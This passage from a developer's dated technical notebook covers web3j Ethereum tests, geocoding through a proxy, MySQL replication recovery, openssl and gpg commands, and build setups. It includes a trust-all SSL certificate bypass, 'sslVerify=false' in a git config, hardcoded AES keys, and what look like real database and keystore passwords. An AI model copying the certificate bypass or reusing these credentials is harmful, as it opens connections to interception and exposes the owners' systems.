        TutorialToken tutorialToken = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
        BigInteger balance = tutorialToken.balanceOf("0x231cbc2edc97071b903aed2e7d90ec792c08c57e").send();
        log.info("TT balance: " + balance);
    }

    @Test
    public void transferTutorialToken() throws Exception {
        List<String> account = web3j.ethAccounts().send().getAccounts();
        String account1 = account.get(0);
        String account2 = account.get(1);

        //String contractAddress = "0x15b4cd705c0646c551e264c3a5f5b0ac0ad0ad09";

        TutorialToken tutorialToken = TutorialToken.load(contractAddressOfTT, web3j, coinBaseCredentials, Contract.GAS_PRICE, Contract.GAS_LIMIT);
        TransactionReceipt receipt = tutorialToken.transfer(account2, BigInteger.valueOf(2000)).send();
        log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s", receipt.getTransactionHash(), receipt.getBlockHash(), receipt.getFrom(), receipt.getTo()));

        BigInteger balance = tutorialToken.balanceOf(account1).send();
        log.info("TT balance: " + balance);

        BigInteger balance2 = tutorialToken.balanceOf(account2).send();
        log.info("balance2: " + balance2);

        tutorialToken.getTransferEvents(receipt).forEach(resp -> {
            log.info("TT transaction, from: " + resp.from + ", to: " + resp.to);
        });
    }

    @Test
    public void etherBalance() throws IOException {
        EthGetTransactionCount transactionCount = web3j.ethGetTransactionCount(coinbase.getAddress(), DefaultBlockParameterName.LATEST).send();
        Transaction transaction = Transaction.createEtherTransaction(coinbase.getAddress(), transactionCount.getTransactionCount(), BigInteger.valueOf(20_000_000_000L), BigInteger.valueOf(21_000),
                coinBaseCredentials.getAddress(), BigInteger.valueOf(25_000_000_000_000_000L));
        web3j.ethSendTransaction(transaction).send();
        EthGetBalance balance = web3j.ethGetBalance(coinBaseCredentials.getAddress(), DefaultBlockParameterName.LATEST).send();
        log.info("Ether Balance: " + balance.getBalance().longValue());
    }

    @Test
    public void etherTransfer() throws IOException {
        EthAccounts accounts = web3j.ethAccounts().send();
        for (int i = 1; i < accounts.getAccounts().size(); i++) {
            EthGetTransactionCount transactionCount = web3j.ethGetTransactionCount(coinbase.getAddress(), DefaultBlockParameterName.LATEST).send();
            Transaction transaction = Transaction.createEtherTransaction(coinbase.getAddress(), transactionCount.getTransactionCount(), Contract.GAS_PRICE, Contract.GAS_LIMIT,
                    accounts.getAccounts().get(i), BigInteger.valueOf(25_000_000_000L));

            EthSendTransaction response = web3j.ethSendTransaction(transaction).send();
            if (response.getError() != null) {
                log.error(String.format("Transaction error: %s", response.getError().getMessage()));
            }

            log.info(String.format("Transaction: %s, TransactionHash: %s", response.getResult(), response.getTransactionHash()));
            EthGetTransactionReceipt receipt = web3j.ethGetTransactionReceipt(response.getTransactionHash()).send();
            /*if (receipt.getTransactionReceipt().isPresent()) {
                TransactionReceipt r = receipt.getTransactionReceipt().get();
                log.info(String.format("Tx receipt: from=%s, to=%s, gas=%s, cumulativeGas=%s", r.getFrom(), r.getTo(), r.getGasUsed().intValue(), r.getCumulativeGasUsed().intValue()));
            }*/

            receipt.getTransactionReceipt()
                    .ifPresent(r -> log
                            .info(String.format("Tx receipt: from=%s, to=%s, gas=%s, cumulativeGas=%s", r.getFrom(), r.getTo(), r.getGasUsed().intValue(), r.getCumulativeGasUsed().intValue())));

            EthGetBalance balance = web3j.ethGetBalance(accounts.getAccounts().get(i), DefaultBlockParameterName.LATEST).send();
            log.info(String.format("Ether Balance: address=%s, amount=%s", accounts.getAccounts().get(i), balance.getBalance().longValue()));
        }
    }
}

Request ether from Rinkeby

https://gist.github.com/cryptogoth/10a98e8078cfd69f7ca892ddbdcf26bc

windows 1: geth --datadir=./.rinkeby attach ipc:\\.\pipe\geth.ipc console
windows 2: geth attach ipc:\\.\pipe\geth.ipc
> personal.newAccount("notmyrealpassword")
> eth.getBalance(eth.coinbase)

Go to https://www.rinkeby.io/#faucet and copy your post
Or
http://rinkeby-faucet.com/
https://rinkeby.etherscan.io/balancecheck-tool
https://ethereum.stackexchange.com/questions/34718/how-do-i-buy-tokens-on-the-rinkeby-test-environment

Register a infura.io account to get a access-api through https:/infura.io/register

endpoint: https://rinkeby.infura.io/v3/your-api
note that rinkeby does not support following method

1
2
3

web3j.transactionObservable().subscribe(tx -> {
    log.info(String.format("New tx: id=%s, block=%s, from=%s, to=%s, value=%s", tx.getHash(), tx.getBlockHash(), tx.getFrom(), tx.getTo(), tx.getValue().intValue()));
});

Reference

https://stevenocean.github.io/2018/04/06/web3j-ethereum-token.html
https://dzone.com/articles/intro-to-blockchain-with-ethereum-web3j-and-spring
https://www.codeooze.com/categories/blockchain/

https://truffleframework.com/tutorials/pet-shop
https://truffleframework.com/docs/truffle/testing/writing-tests-in-javascript
https://truffleframework.com/tutorials/robust-smart-contracts-with-openzeppelin
https://metamask.io
https://medium.com/@dmihal/create-an-erc20-token-using-zeppelin-ethpm-fc99f794d153

https://github.com/eugenp/tutorials/tree/master/ethereum
https://docs.web3j.io/getting_started.html#transactions
https://piotrminkowski.wordpress.com/2018/06/22/introduction-to-blockchain-with-java-using-ethereum-web3j-and-spring-boot/
https://github.com/piomin/sample-spring-blockchain-contract

https://cryptozombies.io

https://theethereum.wiki/w/index.php/ERC20_Token_Standard

crowdsale

https://github.com/TokenMarketNet/ico
https://medium.com/@VladimirTikhomirov/how-its-made-crowdsale-contract-1120b487cc4a
https://www.ethereum.org/crowdsale
https://blog.zeppelin.solutions/how-to-create-token-and-initial-coin-offering-contracts-using-truffle-openzeppelin-1b7a5dae99b6
https://github.com/OpenZeppelin/openzeppelin-solidity/blob/master/contracts/examples/SampleCrowdsale.sol

2018-07-25

2018-07-25

google map geocode okhttp proxy

In order to call google-maps geocode web service, we used library google-maps-services-java,

https://github.com/googlemaps/google-maps-services-java

Sample of call geocdoe web service

https://maps.googleapis.com/maps/api/geocode/json?address=1%20kowloon

Since the keystore xx_egis.jks is configured for ssl trust store in wildfly with -Djavax.net.ssl.trustStore=xx_egis.jks, we have two ways to call the ssl web service,

1. bypass the ssl certificate validation

After investigation on the api of library google-maps-services-java, found that it did not expose the underly okhttp3.OkHttpClient, so it cannot apply following sample code to bypass ssl certificate validation,

private static OkHttpClient.Builder configureToIgnoreCertificate(OkHttpClient.Builder builder) {
        LOGGER.warn("Ignore Ssl Certificate");
        try {

            // Create a trust manager that does not validate certificate chains
            final TrustManager[] trustAllCerts = new TrustManager[] {
                    new X509TrustManager() {
                        @Override
                        public void checkClientTrusted(java.security.cert.X509Certificate[] chain, String authType)
                                throws CertificateException {
                        }

                        @Override
                        public void checkServerTrusted(java.security.cert.X509Certificate[] chain, String authType)
                                throws CertificateException {
                        }

                        @Override
                        public java.security.cert.X509Certificate[] getAcceptedIssuers() {
                            return new java.security.cert.X509Certificate[]{};
                        }
                    }
            };

            // Install the all-trusting trust manager
            final SSLContext sslContext = SSLContext.getInstance("SSL");
            sslContext.init(null, trustAllCerts, new java.security.SecureRandom());
            // Create an ssl socket factory with our all-trusting manager
            final SSLSocketFactory sslSocketFactory = sslContext.getSocketFactory();

            builder.sslSocketFactory(sslSocketFactory, (X509TrustManager)trustAllCerts[0]);
            builder.hostnameVerifier(new HostnameVerifier() {
                @Override
                public boolean verify(String hostname, SSLSession session) {
                    return true;
                }
            });
        } catch (Exception e) {
            LOGGER.warn("Exception while configuring IgnoreSslCertificate" + e, e);
        }
        return builder;
    }

2. Add the ssl certificate to trust store (xx_egis.jks)

Run following command:

openssl s_client -connect maps.googleapis.com:443 -showcerts

Save the certificate (within —–BEGIN CERTIFICATE—– … —–END CERTIFICATE—–) as file google.maps.api.crt (reminder: save the root ca certificate, not the website certificate)

Import the certificate to trust store

keytool -import -trustcacerts -v -alias maps.googleapis.com -file google.maps.api.crt -keystore xx_egis.jks -storepass dxc.xx@2017

List the latest certificates in trust store, it should contain following entries,

keytool -list -keystore xx_egis.jks -storepass dxc.xx@2017
payment_signing, 2018年2月7日, trustedCertEntry,
憑證指紋 (SHA1): 6B:EA:31:51:8D:F8:81:3B:D8:D1:D8:0C:E7:22:12:21:96:E9:59:26
rootca, 2017年8月22日, trustedCertEntry,
憑證指紋 (SHA1): C7:2C:81:6D:EB:2D:C7:36:63:90:D3:68:2D:57:F1:8F:C5:37:AF:DA
friendly3, 2018年1月9日, PrivateKeyEntry,
憑證指紋 (SHA1): CF:42:5A:D1:FB:A1:8F:AA:81:B5:76:F2:39:31:D6:4F:65:88:1A:A1
trust1, 2017年8月22日, trustedCertEntry,
憑證指紋 (SHA1): C4:F1:83:51:20:55:BC:66:2F:D7:BA:F4:D4:7B:C9:43:95:9D:E2:D6
maps.googleapis.com, 2018年7月25日, trustedCertEntry,
憑證指紋 (SHA1): EE:AC:BD:0C:B4:52:81:95:77:91:1E:1E:62:03:DB:26:2F:84:A3:18

My test program to call geocode web service

package test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.InetSocketAddress;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

import com.google.maps.GeoApiContext;
import com.google.maps.GeocodingApi;
import com.google.maps.errors.ApiException;
import com.google.maps.model.GeocodingResult;
import com.google.maps.model.Geometry;

import okhttp3.Headers;
import okhttp3.OkHttpClient;
import okhttp3.Request;
import okhttp3.Response;

public class ConnectionThrProxy {

    public static void main(String[] args) throws IOException {
        //normalCall();
        //okhttpCall();
        mapCall();
    }

    private static void normalCall() throws IOException {
        //System.setProperty("http.proxyHost", "proxy1.govcloud.gov.hk");
        //System.setProperty("http.proxyPort", "4005");

        URL url = new URL("http://www.google.com/");

        String proxyAddress = "proxy1.govcloud.gov.hk";
        Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));

        URLConnection con = url.openConnection(proxy);

        BufferedReader in = new BufferedReader(new InputStreamReader(
                con.getInputStream()));

        // Read it ...
        String inputLine;
        while ((inputLine = in.readLine()) != null)
            System.out.println(inputLine);

        in.close();
    }

    private static void okhttpCall() throws IOException {
        String proxyAddress = "proxy1.govcloud.gov.hk";
        Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));

        OkHttpClient.Builder builder = new OkHttpClient.Builder().proxy(proxy);
        OkHttpClient client = builder.build();

        Request request = new Request.Builder()
                .url("https://publicobject.com/helloworld.txt")
                .build();

        try (Response response = client.newCall(request).execute()) {
            if (!response.isSuccessful())
                throw new IOException("Unexpected code " + response);

            Headers responseHeaders = response.headers();
            for (int i = 0; i < responseHeaders.size(); i++) {
                System.out.println(responseHeaders.name(i) + ": " + responseHeaders.value(i));
            }

            System.out.println(response.body().string());
        }
    }

    private static void mapCall() {
        String googleMapKey = "key-id";
        String proxyAddress = "proxy1.govcloud.gov.hk";
        Proxy proxy = new Proxy(Proxy.Type.HTTP, new InetSocketAddress(proxyAddress, 4005));
        GeoApiContext context = new GeoApiContext.Builder().apiKey(googleMapKey).proxy(proxy).build();

        GeocodingResult[] results;

        String address = "16 FLOOR EMPEROR COMMERCIAL CENTRE 39 DES VOEUX ROAD CENTRAL CENTRAL HONG KONG";
        try {
            results = GeocodingApi.geocode(context, address).await();
            if (results.length > 0) {
                Geometry geometry = results[0].geometry;

                double lat = geometry.location.lat;
                double lng = geometry.location.lng;
                String locType = geometry.locationType.toString();
                String formattedAddr = results[0].formattedAddress;
                System.out.println("formattedAddr " + formattedAddr);
                
                System.out.println("lat " + lat);
                System.out.println("lng " + lng);
                //printGeoResult(appl.getEngApplName(), results);
            } else {
                System.out.println("no geo result returned for address {}" + address);
            }
        } catch (ApiException | InterruptedException | IOException e) {
            System.out.println("findGeoLocation" + e);
        }

    }
}

Run the program with showing detail debug message

Folder structure

ConnectionThrProxy.class

lib/
 google-maps-services-0.2.8.jar
 gson-2.8.0.jar
 joda-time-2.10.jar
 okhttp-3.8.1.jar
 okio-1.13.0.jar
 slf4j-api-1.7.24.jar
 
java -cp ".;lib/*" -Djavax.net.ssl.trustStore=xx_egis.jks -Djavax.net.debug=ssl test.ConnectionThrProxy

SSL debug parameter for reference
-Djavax.net.debug=ssl | -Djavax.net.debug=all

2018-05-31

2018-05-31

Install neo project

Install dotnet core

1 2	download dotnet-sdk-2.1.200-linux-x64.tar.gz tar zxf dotnet-sdk-2.1.200-linux-x64.tar.gz

Install cmake

1 2	wget https://cmake.org/files/v3.11/cmake-3.11.2-Linux-x86_64.tar.gz tar xvf cmake-3.11.2-Linux-x86_64.tar.gz

Config cmake in environment path
PATH=$PATH:$HOME/.local/bin:$HOME/bin:/home/ec2-user/neo/dotnet-core:/home/ec2-user/neo/leveldb/cmake-3.11.2-Linux-x86_64/bin

Install snappy

1 2	git clone https://github.com/google/snappy cd snappy/

we need to build a share object of snappy lib, change file CMakeLists.txt as below

option(BUILD_SHARED_LIBS "Build shared libraries(DLLs)." OFF)
=>
option(BUILD_SHARED_LIBS "Build shared libraries(DLLs)." ON)

Run commands below to install snappy share object

mkdir build 
cd build 
cmake ../
make
sudo make install

neo-leveldb (not google) (obsolated)

git clone https://github.com/neo-project/leveldb
make
cd out-shared/
sudo cp libleveldb.so.1.19 /usr/local/lib64/
cd /usr/local/lib64/
sudo ln -s libleveldb.so.1.19 libleveldb.so.1
sudo ln -s libleveldb.so.1 libleveldb.so
sudo ldconfig -v

leveldb (google)

wget https://github.com/google/leveldb/archive/master.zip
unzip master.zip
cd leveldb-master/
mkdir -p build && cd build
cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=on .. && cmake --build .
sudo cp -p libleveldb.so /usr/local/lib64/
sudo ldconfig -v

neo-cli

git clone https://github.com/neo-project/neo-cli
cd neo-cli
dotnet publish -c Release
dotnet /home/ec2-user/neo/neo-cli/neo-cli/bin/Release/netcoreapp2.0/publish/neo-cli.dll .
  >> show state 
  >> create wallet wallet.db3

neo-compile

1 2	git clone https://github.com/neo-project/neo-compiler dotnet publish -c Release

2018-02-28

2018-02-28

recover-replication-on-mysql

Stop data sync on slave node

1
2
3

mysql -uroot -pcR@2017 xxx_prd
> show slave status \G;
> stop slave;

export data from master node

1
2
3

mysqldump -uroot -pcR@2017 -c psct_prd --no-data any_table1, any_table2 > xxx_prd_schema-only-Dump20180228.sql

mysqldump -uroot -pcR@2017 -c psct_prd | sed 's/ AUTO_INCREMENT=[0-9]*//g' > xxx_prd_dmp_20190524.sql(export all data)

Using Search and Replace to remove *auto_increment=DE to DE directive since the exported schema sql included auto_increment value (no need as use sed to filter auto increment)

Show status on master node

SHOW MASTER STATUS\G;
show master logs;\G
show binlog events\G;
show variables like 'log_%';

create replication user if neccessary

> CREATE USER replication@slave_node;
> GRANT REPLICATION SLAVE ON *.* TO replication@slave_node IDENTIFIED BY 'password';
> FLUSH privileges;
> SHOW MASTER STATUS

import data from master node

1	mysql -uroot -pcR@2017 xxx_prd < xxx_prd.sql

start slave to replicate data from binlog.000198
1
2
3
4
5
6
7
change master to
master_host='master_node',
master_port=3306,
master_user='replication',
master_password='password',
master_log_file='mysql-bin.000198',
master_log_pos=821;
Or just run as below to update master info and relay log info, please check whether relay-log.info is updated and check progress of data replication.
change master to master_log_file='mysql-bin.000198',master_log_pos=821;

Then start slave process
start slave;

lines in ‘show slave status \G;’ should be noticed
1
2
Slave_IO_Running: Yes
Slave_SQL_Running: Yes
for common issue of failure of MySQL replication, use sql_slave_skip_counter to skip error
1
2
3
stop slave;
set global sql_slave_skip_counter=1;
start slave;
Reference
线上MYSQL同步报错故障处理总结
 實做 MySQL Master-Master Replication 同步
 mysql主从复制-CHANGE MASTER TO 语法详解
 3分钟解决MySQL 1032 主从错误
 MySQL的binlog日志 (great article)
Mysql Replication 設定
 MySQL 設定 Master-Slave Replication 同步

2017-11-14

2017-11-14

gpg

list public key pubring
gpg -k

pub   4096R/7BB9E54D 2014-03-10
uid                  EGIS PPS UAT (PPS Testing cert) <egis_support@ogcio.gov.hk>
sub   4096R/C35F602F 2014-03-10

pub   4096R/0490D4D2 2017-11-02 [expires: 2019-11-02]
uid                  Mars Registry (For PPS Recon. File Encryption) <mars@gmail.com>
sub   4096R/B3D05CBB 2017-11-02 [expires: 2019-11-02]

list private key secring
gpg -K

sec   4096R/7BB9E54D 2014-03-10
uid                  EGIS PPS UAT (PPS Testing cert) <egis_support@ogcio.gov.hk>
ssb   4096R/C35F602F 2014-03-10

sec   4096R/0490D4D2 2017-11-02 [expires: 2019-11-02]
uid                  Mars Registry (For PPS Recon. File Encryption) <mars@gmail.com>
ssb   4096R/B3D05CBB 2017-11-02

export public key
gpg --export --armor 0490D4D2 > ogcio_pps.pub
export private key
gpg --export-secret-keys --armor 0490D4D2 > ogcio_pps.sec
list key details to get the key id
gpg --export 0490D4D2|gpg --list-packets --verbose
get key id from gpg file
gpg --list-packets <filename>
sign file
gpg --output doc.sig --sign doc (default output is doc.gpg)
gpg --output doc.sig --clearsign doc => (clear text signature)
verify and decrypt
gpg doc.sig
sign detached
gpg --output doc.sig --detach-sig doc
verify
gpg --verify doc.sig doc

2017-07-05

2017-07-05

git config

[core]
  repositoryformatversion = 0
  filemode = false
  bare = false
  logallrefupdates = true
  symlinks = false
  ignorecase = true
  hideDotFiles = dotGitOnly
[alias]
  st=status
  ci=commit
  co=checkout
  br=branch
  di=difftool
  mt=mergetool
[remote "origin"]
  url = https://192.168.1.107/git/my-repo.git
  fetch = +refs/heads/*:refs/remotes/origin/*
[remote "usb"]
  url = G:\\share_drive\\Other\\my-repo.git
  fetch = +refs/heads/*:refs/remotes/origin/*

[diff]
    tool = bc3
[difftool]
    prompt = false
[difftool "bc3"]
    #use cygpath to transform cygwin path $LOCAL (something like /tmp/U5VvP1_abc) to windows path, because bc3 is a windows software
    #cmd = \"c:/program files/beyond compare 3/bcomp.exe\" "$(cygpath -w $LOCAL)" "$REMOTE"
    cmd = \"C:/Software/Beyond Compare 3/bcomp.exe\" \"$LOCAL\" \"$REMOTE\"
[merge]
    tool = bc3
[mergetool]
    prompt = false
[mergetool "bc3"]
    #trustExitCode = true
    cmd = \"C:/Software/Beyond Compare 3/bcomp.exe\" "$LOCAL" "$REMOTE" "$BASE" "$MERGED"

[user]
  name = Forrest Wan
  email = forestwwk@gmail.com
[http]
  #proxy = http://proxy1.scig.gov.hk:8080
  sslVerify=false
[https]
  #proxy = http://proxy1.scig.gov.hk:8080
[credential]
  helper = store

2017-03-15

2017-03-15

Openssl Hash Crypto Sign Verify

Random

openssl rand -base64 32
==>

Generally, salt is produced with class SecureRandom
SecureRandom random = new SecureRandom();
byte[] salt = new byte[32];
random.nextBytes(salt);

Other ways

1
2
3

date +%s | sha256sum | base64 | head -c 32 ; echo
date | md5sum
tr -cd '[:alnum:]' < /dev/urandom | fold -w30 | head -n1

Reference
https://www.howtogeek.com/howto/30184/10-ways-to-generate-a-random-password-from-the-command-line/

Hash

Encoding with hex(hexdump or xxd)/base64 and openssl base64

echo -n AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=|base64 -d > salt.txt
==>
echo -n AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=|openssl base64 -d > salt.txt

cat salt.txt|base64
==>
cat salt.txt|openssl base64 Display the character “AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=”

hexdump -C salt.txt OR cat salt.txt |hexdump -C OR xxd salt.txt
==>

JAVA code
BASE64Decoder decoder = new BASE64Decoder();
for (byte b : decoder.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")) {
  System.out.printf("%02x", b); // same as encoded by xxd -p
}

To decode hexadecimal number, using echo -n '0: 50617373776f72643031' | xxd -r => Password01 OR echo -n 50617373776f72643031 | xxd -r -p

Message Digest or Hash: md5sum, sha1sum, sha256sum and openssl md5, sha1, sha256, sha512

md5sum salt.txt == cat salt.txt |openssl md5 == openssl dgst -md5 -hex salt.txt == openssl md5 < salt.txt
sha1sum salt.txt == cat salt.txt |openssl sha1 == openssl dgst -sha1 -hex salt.txt == openssl sha1 < salt.txt
sha256sum salt.txt == cat salt.txt |openssl sha256 == openssl dgst -sha256 -hex salt.txt == openssl sha256 < salt.txt
sha512sum salt.txt == cat salt.txt |openssl sha256 == openssl dgst -sha512 -hex salt.txt == openssl sha512 < salt.txt

Hash password with salt [sha512(salt+password)]

echo Password01 > pass.txt (or with -n to remove the \n or using printf)
cat salt.txt pass.txt > combined.txt
tr -d '\n' < combined.txt > combined2.txt // remove the \n
sha512sum combined2.txt

==>

JAVA code
MessageDigest md = MessageDigest.getInstance("SHA-512");
BASE64Decoder decoder = new BASE64Decoder();

ByteArrayOutputStream array = new ByteArrayOutputStream();
array.write(d.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")); // salt
array.write("Password01".getBytes()); // password

/* Same as below
md.update(d.decodeBuffer("AP0PZxpsbyyrznZzeMkkEAPn726JmkgzwZrE5qwHKNY=")); // salt
md.update("Password01".getBytes()); // password
*/

for (byte b : md.digest(array.toByteArray())) {
  System.out.printf("%02x", b);
}

Encrypt/Decrypt

Symmetric crypto with AES

Encrypt using salt

1 2	echo "randomprhase" \| openssl aes-128-cbc -out message.enc (default with salt) echo "randomprhase" \| openssl aes-128-cbc -nosalt -out nosalt.enc (without salt)

Reference: http://stackoverflow.com/questions/7303103/java-aes-encryption-with-salt

Encryption by openssl and java

1
2
3

echo -n qkjll5@2md3gs5Q@|xxd -p ==> 716b6a6c6c3540326d643367733551400a

echo -n secret | openssl enc -aes-128-ecb -K 716b6a6c6c3540326d643367733551400a -a

=>

public class CipherTest {
    
    private static final String ALGORITHM = "AES/ECB/PKCS5Padding";
    private static byte[] keyValue = "qkjll5@2md3gs5Q@".getBytes(); // key length should be 16

    public static String encrypt(String valueToEnc) throws Exception {
        Key key = generateKey();
        Cipher c = Cipher.getInstance(ALGORITHM);
        c.init(Cipher.ENCRYPT_MODE, key);
        byte[] encValue = c.doFinal(valueToEnc.getBytes());
        String encryptedValue = new BASE64Encoder().encode(encValue);
        return encryptedValue;
    }

    public static String decrypt(String encryptedValue) throws Exception {
        Key key = generateKey();
        Cipher c = Cipher.getInstance(ALGORITHM);
        c.init(Cipher.DECRYPT_MODE, key);
        byte[] decordedValue = new BASE64Decoder().decodeBuffer(encryptedValue);
        byte[] decValue = c.doFinal(decordedValue);
        String decryptedValue = new String(decValue);
        return decryptedValue;
    }

    private static Key generateKey() throws Exception {
        Key key = new SecretKeySpec(keyValue, "AES");
        // SecretKeyFactory keyFactory = SecretKeyFactory.getInstance(ALGORITHM);
        // key = keyFactory.generateSecret(new DESKeySpec(keyValue));
        return key;
    }
    
    public static void main(String[] args) throws Exception {
        String password = "secret";
        String passwordEnc = CipherTest.encrypt(password);
        String passwordDec = CipherTest.decrypt(passwordEnc);

        System.out.println("Plain Text : " + password);
        System.out.println("Encrypted : " + passwordEnc);
        System.out.println("Decrypted : " + passwordDec);
    }
}

For cbc or cfb, iv should be provided. In java code, the IvParameterSpec is need to define.

Openssl encryption sample

echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -a -K 00000000000000000000000000000000
=>
N2+bVLU8fIS7ucFW1Qr/xwFD22PuZrDN/59pkXaAFR4= (base64 encoded with option -a)

echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd -p
=>
376f9b54b53c7c84bbb9c156d50affc7 (hex encoded with options -nopad, and xxd -p)

echo '0: 63616e746765747468697332776f726b' | xxd -r | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd |cut -c10-50
=>
376f 9b54 b53c 7c84 bbb9 c156 d50a ffc7 (hex encoded with cut -c10-50)

echo -n '63616e746765747468697332776f726b' | xxd -r -p | openssl enc -aes-128-ecb -nopad -K 00000000000000000000000000000000|xxd |cut -c10-50
=>
376f 9b54 b53c 7c84 bbb9 c156 d50a ffc7 (xxd -r -p and hex encoded with cut -c10-50)

Reference: http://stackoverflow.com/questions/38082644/how-to-generate-the-output-in-hexadecimal-in-openssl

Asymmetric crypto with RSA

Generate key, publicKey

openssl genrsa -out key.pem
openssl rsa -in key.pem -pubout > key-pub.pem

openssl rsautl -encrypt -in pass.txt -pubin -inkey key-pub.pem -out pass.encrypted
openssl rsautl -decrypt -in pass.encrypted -inkey key.pem

Encrypt/decrypt with base64/hex encode/decode (Interesting)

1
2
3

echo -n test | openssl rsautl -encrypt -pubin -inkey key-pub.pem | base64 | base64 -d|openssl rsautl -decrypt -inkey key.pem => test

echo -n test | openssl rsautl -encrypt -pubin -inkey key-pub.pem | xxd -p | xxd -r -p |openssl rsautl -decrypt -inkey key.pem => test

Java: https://javadigest.wordpress.com/2012/08/26/rsa-encryption-example/

Sign/Verify

Generate key, publicKey

1 2	openssl genrsa -out key.pem openssl rsa -in key.pem -pubout > key-pub.pem

Sign/Verify a file with openssl dgst

1 2	openssl dgst -sha256 -sign key.pem -out pass.sign pass.txt openssl dgst -sha256 -verify key-pub.pem -signature pass.sign pass.txt

Sign/Verify a file with openssl rsautl

1
2
3

openssl rsautl -sign -inkey key.pem -out pass.rsa -in pass.txt
openssl rsautl -verify -inkey key-pub.pem -in pass.rsa -pubin
openssl rsautl -verify -inkey key-pub.pem -in pass.sign -pubin

GPG

Convert keys between GnuPG, OpenSsh and OpenSSL
http://sysmic.org/dotclear/index.php?post/2010/03/24/Convert-keys-betweens-GnuPG%2C-OpenSsh-and-OpenSSL

Other openssl command

ssh public key stored in .ssh folder: 
ssh-keygen -f koding -y > koding_id_rsa.pub (openssl genrsa -out key.pem)

show public key from the private key
openssl rsa -in koding -pubout > koding-pub.pem

show -modulus from the private key
openssl rsa -in key.pem -noout -modulus

p12 file (usually with .pfx extension) contains certificate, public key, private key
openssl x509 - for certificate
openssl x509 -inform der -in certificate.cer -out certificate.pem (with -pubkey -noout to print public key only)

openssl pkcs12 - for p12 file
openssl pkcs12 -in certificate.pfx -out certificate.cer -nodes -passin pass:"3228474250821687" | openssl x509 -noout -subject
keytool -list -v -keystore P_DS_WONGTWOMANA1136227_Valid785781e3_123.p12 -storepass 123 -storetype pkcs12

openssl rsa - for private key
openssl rsa -in koding -out koding2 (Remove a passphrase from a private key)

openssl req - for private key and csr related
openssl req -out koding.csr -key koding -new


scratch domain csr
openssl req -new -sha256 -key scratch.key -subj "/CN=www.scratch.hk" > scratch.csr
openssl req -new -sha256 -key scratch.key -subj "/" -reqexts SAN -config <(cat /etc/ssl/openssl.cnf <(printf "[SAN]\nsubjectAltName=DNS:scratch.hk,DNS:www.scratch.hk")) > scratch.csr

protocal: ssh, ssl 
symmetric cryptographic algorithm : aes, des, 3des
asymmetric cryptographic algorithm: rsa, dsa
hash    : crc32, md5, sha1, sha256, sha512
aes/des加密速度快,适合大量数据,des容易破解,一般用3重des,后来又出现了更快更安全的aes
rsa是公钥加密,速度慢,只能处理少量数据,优点是公钥即使在不安全的网络上公开,也能保证安全
常见情况是双方用rsa协商出一个密钥后通过aes/3des给数据加密

=========
Using a car analogy:

PGP     is a car
OpenPGP is the design for the PGP car
GnuPG   is another car using the same design
RSA     is a diesel engine, and other engines are available
SSH     isn't a car at all. But it uses engines.

https://program-think.blogspot.com/2010/06/howto-prevent-hacker-attack-3.html

Golang

encoding/json, csv, xml, hex, base64
crypto/aes, des, rsa, dsa, md5, sha1, sha256, sha512, x509

New command to learn

tr, xxd

2017-03-14

2017-03-14

Move To Anthor Tablespace

– ALTER TABLESPACE PRLS_DATA OFFLINE NORMAL;

select ‘ALTER TABLE ‘ || OWNER || ‘.’ || TABLE_NAME || ‘ MOVE TABLESPACE ‘ || ‘DESTINATION_TABLESPACE’ || ‘;’ from DBA_TABLES WHERE OWNER = ‘XX’;

select ‘ALTER INDEX ‘ || OWNER || ‘.’ || INDEX_NAME || ‘ REBUILD TABLESPACE ‘ || ‘DESTINATION_TABLESPACE’ || ‘;’ from DBA_INDEXES WHERE OWNER = ‘XX’;

– ALTER TABLESPACE PRLS_DATA ONLINE;

Change default tablespace
alter user xx
default tablespace DESTINATION_TABLESPACE;

2017-03-02

2017-03-02

Cross Compile Go File

sudo apt-get install gcc-arm-linux-gnueabihf

sudo apt-get install gcc-multilib g++-multilib Fix “fatal error: ‘sys/cdefs.h’ file not found # include <sys/cdefs.h>

sudo apt-get install linux-headers-generic Fix “fatal error: asm/errno.h: No such file or directory”

CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.7 /opt/software/go1.7/bin/go env

CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.7 /opt/software/go1.7/bin/go build -o bin/server-linux-arm.out -ldflags="-s -w" src/Rekap\ Remote\ Server.go

CC=arm-linux-gnueabihf-gcc GOOS=linux GOARCH=arm GOARM=6 CGO_ENABLED=1 GOPATH=/opt/software/SimpleComputerRemote/Host GOROOT=/opt/software/go1.5 /opt/software/go1.5/bin/go build -o bin/server-linux-arm.out -ldflags="-s -w" src/Rekap\ Remote\ Server.go

At the end, but fail to cross compile the SimpleComputerRemote project, so this article is just for reference.

Reference
http://linux-sunxi.org/Toolchain
[進階] 安裝 Raspberry Pi 的 Toolchain
http://www.veryarm.com/296.html
arm交叉編譯器gnueabi、none-eabi、arm-eabi、gnueabihf、gnueabi區別

2017-01-19

2017-01-19

Setup Minidlna omxplayer bluetooth on RPi

Install minidlna by `sudo apt-get install minidlna`

Changes in /etc/minidlna.conf

1 2	media_dir=/home/pi/minidlna db_dir=/var/lib/minidlna (allow minidlna to index files)

Restart minidlna,

sudo systemctl restart minidlna
